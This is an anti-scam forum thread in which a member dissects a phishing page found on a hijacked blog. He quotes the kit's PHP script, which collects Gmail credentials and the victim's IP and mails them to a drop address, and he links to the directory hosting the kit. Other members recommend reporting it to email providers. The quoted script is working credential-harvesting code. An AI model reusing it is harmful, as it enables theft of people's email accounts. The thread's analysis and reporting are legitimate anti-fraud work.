SmartFeedSmartFeed          

Anti Scam News Blog


WELCOME - YOU ARE CURRENTLY VIEWING 419EATER AS A GUEST

By joining our community you will have the ability to post topics and access other forums reserved for members. Registration is quick, simple and absolutely free. Join our community today by clicking here.

ScamWarners.com - Internet Anti-Fraud Center - now open!


 jasonsamuel.com

View next topic
View previous topic
 
Post new topicReply to topic
Author Message
zzz
Master Baiter


Joined: 14 Jun 2012
Posts: 100
Location: England


PostPosted: Wed Jun 27, 2012 9:29 am Reply with quoteBack to top

If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:

Quote:
To access our online secured auction page,
you are required to choose your email address below


Here is the link:

http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm

It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.

This is 100% fake and the purpose is to collect email/password information from innocent victims.

I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here is the contents of one of the PHP files:

Quote:
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "mrsjanesmith0909@gmail.com";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>


I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:

mrsjanesmith0909@gmail.com

If anybody else wants to take a look, open the following link (it is safe):

http://www.jasonsamuel.com/fitness/properties/

It will open a directory contents, download the properties.zip file. The code listed above I extracted from gmail.php - the other php files in fact perform exactly the same thing - sending victim's email and password to this same email address:

mrsjanesmith0909@gmail.com


What should be the course of action?

_________________
Closed lad accounts x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"

"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"

"You email has been received and from my understanding your email is not well understood."
View user's profileSend private message
B8er
boomdazzler


Joined: 16 Feb 2009
Posts: 5320
Location: On Skype, causing mayhem.


PostPosted: Wed Jun 27, 2012 10:57 am Reply with quoteBack to top

It's a phishing site, which we don't deal with here.

The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.

They will soon get it closed down.

_________________
As regard the blanck paper, I wanted to put in the word, but I didn't remember to write the words before we took the pictures. - Pastor Evans
Which one is your name Gender: Male or Mike Hunt - Samson Johnson
Safari Larry Uzo - Abia state Nigeria>Cotonou>Natitingou>Cotonou>Abia State
United Kingdom x 163 United States x 59 Nigeria x 19 Netherlands x 5 Canada x 4 x 4 Thailand x 4 United Nations x 4 Australia x 3 Malaysia x 3 United Arab Emirates x 3 Benin x 2 China x 2 Denmark x 2 Ghana x 2 Ivory Coast x 2 Korean Flag x 2 Senegal x 2 South Africa x 2 Spain x 2 Sweden x 2 Burkina Faso Cambodia Flag cameroon Germany Hong Kong Japan New Zealand Togo Ukraine Elite Ninja Team Member
Cellphone x 2 Closed lad accounts x 273 x 264 - Fake cheques: $4,037,669.64 USD
500 in 6: 496 Points
View user's profileSend private message
zzz
Master Baiter


Joined: 14 Jun 2012
Posts: 100
Location: England


PostPosted: Wed Jun 27, 2012 11:07 am Reply with quoteBack to top

^^^ Reported to Google.

Can a mod close this thread please?

_________________
Closed lad accounts x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"

"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"

"You email has been received and from my understanding your email is not well understood."
View user's profileSend private message
woody999
Dormain Reshuffler


Joined: 30 May 2009
Posts: 12649
Location: East of Humptulips


PostPosted: Wed Jun 27, 2012 1:02 pm Reply with quoteBack to top

Marking as n/a and can be moved offline

_________________
"Why do you tell lies that are not useful" Phillip Okeke
"I lost my assories" Barr. Angus Bu...g

"YOU NEED SOME DOCTOR" Barrister Peter Paul

I dont know who is lieing ,either you or F3lcha1r -
>23 Closed lad accounts x 130 Goat Easter Egg Purple Flower
United StatesNigeriaSpainUnited KingdomChinaGhanaUnited NationsThailandFilipino flagCambodia FlagcameroonGermanyMalaysiaSouth AfricaCanadaBeninRussiaFranceCayman IslandsLuxembourg
Ivory CoastBurkina FasoPortugalUnited Arab EmiratesTogoMexican FlagNetherlandsAustraliaIndonesiaSwitzerlandItalySenegalTurkeyJapanGibraltar
Peru : sri lanka : USVI : Oman x 4581
Cellphone x 43 Nurse Nastys Audi TT x2
View user's profileSend private messageSend e-mail
Display posts from previous:      
Post new topicReply to topic


 Jump to:   



View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



E-Mail Header Analysis


All Content © 2003 - 419Eater.com
Powered by phpBB © 2001, 2002 phpBB Group :: FI Theme :: All times are GMT